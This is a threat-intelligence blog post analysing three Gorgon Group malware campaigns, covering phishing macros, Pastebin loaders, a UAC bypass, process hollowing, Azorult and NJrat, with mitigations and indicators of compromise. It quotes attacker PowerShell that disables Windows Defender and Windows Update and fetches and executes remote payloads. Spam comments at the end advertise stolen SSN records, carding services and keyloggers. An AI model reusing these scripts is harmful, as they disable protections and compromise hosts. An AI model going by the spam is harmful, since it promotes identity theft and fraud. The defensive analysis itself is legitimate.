Thursday, February 6, 2020

The Triune Threat: MasterMana Returns

Author:Danny Adamitis 


Prevailion’s Tailored Intelligence team has discovered new campaigns associated with the Gorgon Group, suspected Pakistani based actors, who previously operated the MasterMana botnet. While this group relied upon an amalgamation of multiple open-source and commercially available tools, they have proven themselves to be highly capable. By utilizing various 3rd party websites and services, they are able to bypass common network defense mechanisms. Recently they have added new capabilities to evade host-based detection through encoding payloads and renaming file extensions. In some cases, they took a more audacious approach by incapacitating the Windows Defender process. Once on the compromised systems, this actor then abused Microsoft binaries already pre-installed on windows operating systems. By utilizing these preinstalled Microsoft binaries and running processes in memory, they were able to remain quite elusive.

Thus far we have associated three unique clusters of activity to this group, that transpired simultaneously and have remained active to the present day. The first cluster most closely matches the tactics, techniques and procedures (TTPs) outlined in our first report. This approach heavily utilized 3rd party services in order to evade network-based detection. In order to curtail possible host-based detection, the threat actors have added a new .net file named “office.” This program performed a User Account Control (UAC) bypass, allowing the attacker to elevate their privilege level, and then turn off Windows Defender. The threat actors would ultimately deploy Azorult to harvest stored confidential credentials and data.

The second cluster implemented a different kill chain, utilizing fewer third party resources and instead relied upon resources hosted on threat actor-created domains. The group took steps to evade detection through obfuscating PowerShell scripts and renaming the extension file to use “.jpg”, the picture file format. While some of these techniques might seem trivial, these methods reduced the detection rate for some open-source tools to zero on Virustotal. Prevailion then observed the same domain being used to host both payloads and spoofed websites. One spoofed website depicted a login portal with a title of “European Union”, while a second login portal was labeled “DEWA Dubai”, presumably Dubai’s electrical and water authority (DEWA). While we are not able to determine if either site was operationalized, their presence suggests there is a more targeted component to this threat actor activites beyond mass spamming to create the MasterMana botnet.

Documents associated with the third cluster likely targeted Spanish and Portuguese speaking entities. Some documents referenced hotel reservation confirmation, while other domains appeared to be typo-squatted facsimiles. Like the second cluster, this campaign relied more heavily upon threat actor controlled infrastructure than 3rd party services. In one payload the threat actor added an easter egg, performing a character replacement that substituted “11” with “@#_**Classified code”. Lastly, the threat actors would deploy a variant of NJrat that performed host based enumeration to determine if it was run in a virtual machine, and detect if antivirus was present. While this threat actor doesn’t use completely custom backdoors, we assess they pose a critical threat to organizations due to their “moderately sophisticated” approach allowing them to bypass some common detection mechanisms.

Technical Details

Cluster 1

The first cluster of activity closely matched previously documented TTPs that correlated with our previous report titled MasterMana Botnet. This activity relies heavily on various 3rd party services, likely in an attempt to bypass network security appliances. The only variation that we observed was that the group began to diversify their use of 3rd party cloud services to include Discord and They also utilized different trojans like Loki agent in lieu of Azorult, however both trojans served the same purpose of harvesting credentials.

Step 1

One new twist is that the threat actor now appeared to be sending links, that when clicked would download a trojanized Microsoft file. In one instance we observed a trojanized PowerPoint file that was downloaded from a link hosted on Discord, a popular chat application service.

Step 2

The PowerPoint file contained a malicious macro. Using OleTools, we can see that if the macro was enabled it will attempt to run mshta, on the shortened link hxxp://j[.]mp/ajj9j9di3. “” is another file shortening service offered by the same company that runs Bitly.
Deobfuscated output of the malicious macro after being run through OleTools

The threat actors created unique shortened links that likely correspond to each new document. The aforementioned Bitly link expanded to: iwantsecurityresearcherjobplease[.]blogspot[.]com/p/17-uth_2.html.
Bitly metrics showed this campaign focused primarily on the United States, which accounted for 21% of all activity. The second most targeted country was Germany with 11% of all activity.

We identified a second campaign that utilized the same Blogger hostname. This campaign had a shortened link of hxxp://j[.]mp/12j924i3. Of interest, the second link was created just an hour after the first one.

Bitly metrics associated with another campaign using the same Blogger hostname

Step 3

The Blogger webpage appeared to be unfinished when visited in a web browser. However below the surface, the threat actors embedded four encoded scripts.
  1. The first script created a Registry key located at “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\” that would reach out to a pastebin URL ending in “dmDDDeCw”.
  2. The second embedded script had four sub-components.
    1. The first sub-component immediately reached out to a pastebin link ending in “JDeaycuw.”
    2. The second sub-component created a schedule task named “main” that would execute every 60 minutes to the same pastebin link ending in “JDeaycuw.”
    3. The third sub-component would create a registry key called “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Pastemm” and would attempt to contact a pastebin link ending in “uBXqWxts”
    4. The fourth sub-component kills the tasks winword and excel.
  3. The third embedded script contained a PowerShell loader that would contact a Pastebin link ending in “qGHJqiji.”
  4. The last script was named “MySexoPhone” that attempted to deactivate security mechanisms (such as Protected View capabilities) within Microsoft Office products, through modifying the registry.

Step 4

The first Pastebin link ending in “dmDDDeCw” simply said “self.close” at the time of discovery. The second Pastebin link ending in JDeaycuw, was a PowerShell script that appeared to be an amalgamation of the two previously observed loaders. It started off by pinging Google to check for internet connectivity. The PowerShell script then calls two posts, that we later identified as a process hollower and Azorult. These executables would start and then inject into calc.exe. Some entertaining details of the new downloader are the variable names: “vroombrooomkrooom” and “kekedoyouloveme” which are references to a song by the rap artist Drake.

Image showing the new and old PowerShell loader

The third Pastebin link ending in “uBXqWxts” contained a sample downloader script that reached out to a pastebin post ending in “qGHJqiji”. This was the same Pastebin link that was embedded in the third script of the Blogger webpage.

Image of the Pastebin page ending in “qGHJqiji” that turns into “office.dll”

Step 5

One new aspect of this campaign is the “office.dll” written in the dot net framework. The compilation timestamp was from 2020-01-19 15:56:37. The binary mimicked a project on Github by 0x00-0x00 that was designed to bypass user account controls (UAC) in Windows. According to MITRE, a UAC bypass “allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation.” This particular bypass took advantage of a microsoft binary called Connection Manager Service Profile, or cmstp.exe, that was designed to “install a service profile with default settings appropriate to the operating system and to the user's permissions.” Once the executable elevated its privilege levels, it called another function that the threat actor named “dunofrenle23”. The “dunofrenle23” function appeared to originate from a different GitHub project by Nyan-x-cat, that would disable Windows Defender protection on the local host machine. The binary would also set up a service named “NyanCat”. It is likely that this would have been run before the next two payloads, in order to help ensure they evaded detection.

Screenshot of the dunofrenle23 function used to disable windows defender.

This is where we observed a small change, the threat actors shift from hosting their payloads from PasteBin to The first file was originally hosted on paste[.]ee/r/vDP4T, it looked like the file was a PowerShell script that was charcode base 10 encoded script. The resulting output was then obfuscated by appending “OP” in front of the hex characters instead of the standard “x0”. Once the script was deobfuscated, it revealed a .net dynamic link library file named Office, in order to avoid confusion we will refer to this file as the process hollower. Despite using these simple transforms, when the file was uploaded to VirusTotal it had a detection rate of 0.

Copy of the text file hosted on vDP4T once uploaded to Virustotal

The dll was obfuscated using an open-source project called ConfuserEx. One notable aspect was that this file’s neutral resources language was set to Akan (Ghana). Once deobfuscated we noted that most of the functions had the same names as the previous campaign such as “MyVictim.tickleme” and “VOVO.FUN”.

When run the program passes a byte array with the PE data from the PowerShell script. It looks for calc.exe in windows\syswow64 and then which zeros the PE headers from the buffer and calls VOVO.FUN. VOVO.FUN then launches calculator, unmaps the existing section, allocates a new buffer in the calculator process, writes additional payloads into the process, and resumes the thread. This allowed the threat actors to never write the malware to disk. The actors maintained persistence schedule tasks and registry keys, which will periodically grab the injector and RAT, and hollow out the memory of a process that points to a valid image on disk.

After process-hollowing is complete, it injects the second payload that was hosted on paste[.]ee/r/GTqcj. Once deobfuscated, the payload was identified as Azorult, a well-known trojan. As noted by other security researchers, Azorult has been available for sale on Russian forums at prices ranging up to $100US. Most of the functionality was geared towards harvesting credentials that could be found on the victim machine — e.g., email accounts, messenger applications (pidgin, psi+, telegram), web cookies, browser history, and cryptocurrency wallets.

It also had standard trojan functionalities, such as host-based enumeration and the ability to upload and download files, as well as take screenshots. Once the trojan had obtained the information, it would then communicate with a hard-coded IP address hxxp://

Cluster 2

Once we identified that this threat actor was active, we sought out activity that deviated from the pattern identified in cluster 1. One of the major differences with cluster 2 was the use of threat actor-created domains, instead of relying upon 3rd party services. We were able to correlate these two clusters based upon that threat actor’s reuse of the same malicious Blogger hostname “newandupdates1234” which was publically reported upon last year. Like the previous campaign, the threat actors added a UAC bypass feature.

Step 1

The infection mechanism was once again a phishing campaign that impersonated a typical business interaction. The email enticed the victim to open up the malicious excel attachment named “Bank Details Copy.xls.”

Step 2

Presumably the victim would open the attached microsoft excel file and then be prompted to enable macros. However once the macros are enabled, the excel document will appear blank. Meanwhile the macro reached out to another shortened link hxxp://j[.]mp/hdjkashnmbxzcywu. This particular link resolved to the threat actor-controlled Blogger webpage, https://newandupdates1234[.]blogspot[.]com/p/jromas-1.html. One cheeky note: Gorgon Group continued to use this particular blogspot hostname - despite the fact that it was previously reported on at the end of October 2019, by Orange.

Step 3

Bitly metrics indicate this Blogger hostname was still used as recently as January 10th, 2019. This campaign primarily targeted the United States which constituted 66% of all activity. The second and third most impacted countries were the Republic of Korea and India, where each accounted for approximately 4% of all activity.   

Bitly metrics for the shortened URL associated with cluster 2 activity
Once on the Blogger webpage, there was a single embedded script that contacted a Pastebin post ending in “NLTFaNng.”

Step 4

That pastebin post ending “NLTFaNng” contains some lightly obfuscated VBScript that will invoke PowerShell to download a file from the threat actor-controlled domain hxxp://ascendum[.]co/.well-known/Attack.jpg. This particular file had a detection rate of zero when it was uploaded to VirusTotal in January.

The detection rate for the attack.jpg file on Virustotal

Step 5

A notable feature of the attack.jpg file is that the threat actor used the Joint Photographic Experts Group (.jpg) file extension. However when the file is analyzed with exiftools, it was identified as ascii text. Once de-obfuscated it revealed a PowerShell script which runs a different UAC-Bypass script called “FodhelperBypass.ps1” from GitHub, this allowed the attacker to elevate their privilege level. The script then disabled Windows Defender through the registry. Next it altered the configuration settings for Windows Update service, wuauserv, to turn it off and prevent it from running.  Next, the script will attempt to download an hta, HTML executable, file and rename it as “excel.hta”. Proceeding along, the script configures a registry key in order to obtain persistence on the infected host machine.

Below is a snippet of the PowerShell script that disabled Defender, turns off windows update and downloads the next .hta file.   

[String]$program = "powershell.exe -w hidden Add-MpPreference -ExclusionPath '$env:appdata';
New-ItemProperty -Path ?HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender? -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;
'(&(GCM*W-O*)Net.WebClient).DownloadFile('''', ''$env:appdata\excel.hta'');
start-process (''$env:appdata'\excel.hta'')'|iex;Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value ('$env:appdata'+'\'+'excel.hta');sc.exe config wuauserv start= disabled;sc.exe stop wuauserv" #default)

Unfortunately by the time we discovered this particular campaign, the webpage hxxp://ascendum[.]co/.well-known/jromas[.]hta was taken offline.

Credential Harvesting Activities

Once we identified that the domain ascendum[.]co was used by Gorgon Group, we began to look for other malicious activity associated with it. We discovered an task where someone entered the domain hxxps://mail021connect[.]us/e/eu/ into the web browser and was redirected to “hxxp://ascendum[.]co/e/eu/”. An image of that spoofed web page is below, the image was obtained from URLscan. The web page displayed the text “European Union” and prompts users for an email address and password. 

Image of the “European Union” spoofed website from URLScan

We then looked for other spoofed web pages associated with this domain, and found one result in Google’s cached web crawler dated December 30th, 2019. This page had a URL of hxxp://ascendum[.]co/d/dewa/gov/ae/dewa, that displayed “Dewa Dubai”. We surmised that this was likely intended to impersonate Dubai’s Electrical and Water Authority (DEWA), which is run by the government of the United Arab Emirates.

Google’s cache of ascendum[.]co/d/dewa/gov/ae/dewa. It is likely the site would have appeared different as Google did not cache the accompanying image file. 

While we are not able to determine if the threat actors had any success in harvesting credentials associated with either of these websites, this activity indicates there may be more targeted aspects for this particular group. It also revealed an interest in European affairs as well as utility organizations based in the Middle East.

Cluster 3

This cluster also relied more heavily upon actor controlled infrastructure, than 3rd party resources. It began with a malicious email, the majority of these documents were written in Spanish and Portuguese. One of the emails impersonates a hotel from Lisbon with an attached reservation. We believe the threat actor has included references to real hotels in order to socially engineer the victim to click on the malicious attachments, we do not have indications that they actually compromised any hotel computer systems at this time. This cluster has been active since at least mid October 2019, and the most recent document was created on January 27, 2020. The TTPs associated with this most recent campaign are explained below.

Step 1

The victim receives an email with a malicious microsoft file; we observed malicious excel, word and RTF files. The threat actor employs either the Dynamic Data Exchange (DDE) exploit, aka CVE-2017-1999, or a malicious macro. The malicious files reach out to an embedded Bitly domain to retrieve a remote resource.

Step 2

One such excel file was named “package” and we identified the embedded malicious Bitly link as hxxp://bit[.]ly/2NJJILu. Once the shortened link was expanded, it resolved to hxxp://207[.]246[.]68[.]214/abc/attack.jpg. This particular bitly link was created on 21 January, one day after the other Bitly links, and the first click of this particular campaign occured on 23 January 2020.

Step 3

Despite being labeled as a .jpg, when the file command is run, it was identified as an ascii text file. The text was a PowerShell script that adds a couple of unnecessary connotations - likely in an attempt to evade detection from yara rules. It will then download two additional files hosted on the same IP address.

Image of the PowerShell loader script

Step 4

The next two files were hosted on hxxp:// and hxxp://

The first file jancolomb.jpg, is an ascii text file that the threat actor again renamed as a .jpg file. The file started out with a block of code where the threat actors did a character replacement of “11” with “@#_**Classified code”.
Image of the of jancolomb.jpg file as it natively appeared with the “Classified code” replacement

Once fully deobfuscated, the first component reveals a script to check for internet connectivity then downloads the next file and converts the input to hex.

$Tbone='*EX'.replace('*','I');sal M $Tbone;do {$ping = test-connection -comp -count 1 -Quiet} until ($ping);$p22 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtoc.l = $p22;$t= New-Object -Com Microsoft.XMLHTTP;$'GET','',$false);$t.send();$ty=$t.responseText;$asciiChars= $ty -split '-' |ForEach-Object {[char][byte]"0x$_"};$asciiString= $asciiChars -join ''|M

The second file janarab.jpg had roughly the same content, the only difference being the embedded URL for the second payload hxxp://redeturismbrasil[.]com/janeiro/hashtag25janeiro.jpg.

The next component creates a task that runs calc.exe at a specific time. The script appears to be a lightly modified version of the example code found on MSDN. The script will then change the default authentication credential in order to obtain a list of running processes during the system start up.

Step 5

The last step involved downloading two more files hashtag25janeiro.jpg, and janeiro25cifraocolomb.jpg. The first file hashtag25janeiro.jpg contains a block of encoded text that will be compiled on the local system with “aspnet_compiler.exe” and renames the executable named “hackitup”. This executable attempts to elude detection through character replacements as shown below. However the same was identified as being NJrat, designed to harvest credentials, and other confidential information. This variant sent base64 encoded string of the current windows title every time something changes focus. This sample utilized the command and control server located at ducksys[.]ddns[.]net.

Strings with unnecessary replacements to avoid YARA detection

The second file was janeiro25cifraocolomb.jpg, when deobfuscated it revealed a second .net file that threat actor called “edo '' and execution began at edo.tensei.main. This may have been a reference to an anime show called Naruto, that has an episode called “edo tensi”. Of the more notable features in this executable -  it attempts to determine if it was running in a virtual machine such as qemu, vmware, or virtual box. It will also attempt to discover any antivirus products running on the machine, while performing host-based enumeration to obtain the username, machine name, MD5 hash of the crypto system to determine if running as admin. This sample communicated with the same command and control node located at ducksys[.]ddns[.]net:5555.

Screenshot of “tensi” function checking to see if the agent was in a Virtual Machine


In order to better protect your systems from this threat, we suggest a multifaceted approach. The first priority should involve enhanced training for users in the avoidance of unsolicited emails, and to never enable macros from an untrusted source. The next concern is hardening the network, primarily through the use of email security applications as this appears to be the initial infection vector. In order to fortify systems within the perimeter, we recommend implementing Windows recommended block rules for high risk users. This should prevent the system from running certain windows binaries like mshta.exe, msbuild.exe and even cmstp.exe. Implementing these recommended block rules should help prevent infection from this particular threat actor and other advanced actors who use living of the land (lol) binaries for malicious purposes. This should be one consideration, paired with a properly configured and updated anti-virus product. To defend against credential harvesting of email accounts, we recommend using a multi-factor authentication approach such as Google authenticator, DUO or another similar product.

Indicators of Compromise

Cluster 1 - January 21 2020 Campaign
MS ppt File Name:Justificante_de_pago_EUR_198.00000.pps
MS ppt file communicates with:J[.]pm\ajf3j9di3+
Bitly resolves:hxxps://iwantsecurityresearcherjobplease[.]blogspot[.]com/p/17-uth_2.html.
Sha256 webpage:d595bc3f383dcc06b1208e7e4e80767182ea47c08a2165bd89a946218b8419bc
Process hollower:b8f6cad3723d1dd2219d02f930e5cda776c124387f19f3decd867495ce614eb7
Deobfsucated azorult:00f6f084f74d0734be4b0f1b0d864279e1cf2c4aefab588feee4c6ae47663f9f
Azorult C2:hxxp://23.106.160[.]1/Panel/7/index.php

Cluster 2 - January 10 2020 Campaign
Eml file:e632c791314fe06d2b344fd54280188d1b5e23e0fec6a3b42d6e38facb992838
eml file:c4390c5ae31ae653eb88da62ea8754d55d8d684c88663a80d0d551c5a34e1d9c
excel :25246d233b7ec7bacd7a4130dadcedd54d26c9f5d840545736845ad0a583f5fc
Blogger hostname:newandupdates1234[.]blogspot[.]com/p/jromas-1.html
Threat actor-created domain:
Malicious HTA file:hxxp://ascendum[.]co/.well-known/jromas.hta
Cluster 3 - January 26 2020 Campaign
Indicators of compromise:
MS file:530ef68defcda6f4298392450204a77b6e6c7a74fc86b0fabc7cc94633522b04
Bitly URL:hxxp://bit[.]ly/2NJJILu
Hosting payload:hxxp://207[.]246[.]68[.]214/abc/attack.jpg
Attack.jpg: 457d35905622b1f91861b9139990461f35aa383a4ecd36c848bbd875465d1839
Second downloader:hxxp://207[.]246[.]68[.]214/abc/jancolomb.jpg
Second downloader:hxxp://207.246.68[.]214/abc/janarab.jpg
Trojan URL:hxxp://redeturismbrasil[.]com/janeiro/hashtag25janeiro.jpg
Hashtag25janeiro.jpg: cda1af73bb45ed89d69e559ff3186b2e4217cf30dde5e322ecc840a98bdc2d50
Trojan URL:hxxp://redeturismbrasil[.]com/janeiro/janeiro25cifraocolomb.jpg
Edo.tensi: 36df477505c3872ddc5a0ed647665f2a0c5f2ed36d0b29a540c115d3a1906ec5
Threat actor C2:ducksys[.]ddns[.]net

Additional files associated with cluster 3


  1. Hey Guys !

    USA Fresh & Verified SSN Leads with DL Number AVAILABLE with 99.9% connectivity
    All Leads have genuine & valid information

    First Name | Last Name | SSN | Dob | DL Number | Address | City | State | Zip | Phone Number | Account Number | Bank Name | Employee Details | IP Address

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ->$5 PER EACH

    ->Hope for the long term deal
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email > [email protected]
    Telegram > @leadsupplier
    ICQ > 752822040

    1. Hello all
      am looking few years that some guys comes into the market
      they called themselves hacker, carder or spammer they rip the
      peoples with different ways and it’s a badly impact to real hacker
      now situation is that peoples doesn’t believe that real hackers and carder scammer exists.
      Anyone want to make deal with me any type am available but first
      I‘ll show the proof that am real then make a deal like

      Available Services

      ..Wire Bank Transfer all over the world

      ..Western Union Transfer all over the world

      ..Credit Cards (USA, UK, AUS, CAN, NZ)

      ..School Grade upgrade / remove Records

      ..Spamming Tool

      ..keyloggers / rats

      ..Social Media recovery

      .. Teaching Hacking / spamming / carding (1/2 hours course)

      discount for re-seller

      Contact: 24/7

      [email protected]

  2. This article is actually remarkable one it helps many new users that desire to read always the best stuff.
    ui service


The Gh0st Remains the Same

Author:  Danny Adamitis   Executive Summary  Prevailion’s Tailored Intelligence Team has detected a new advanced campaign dubbed - “...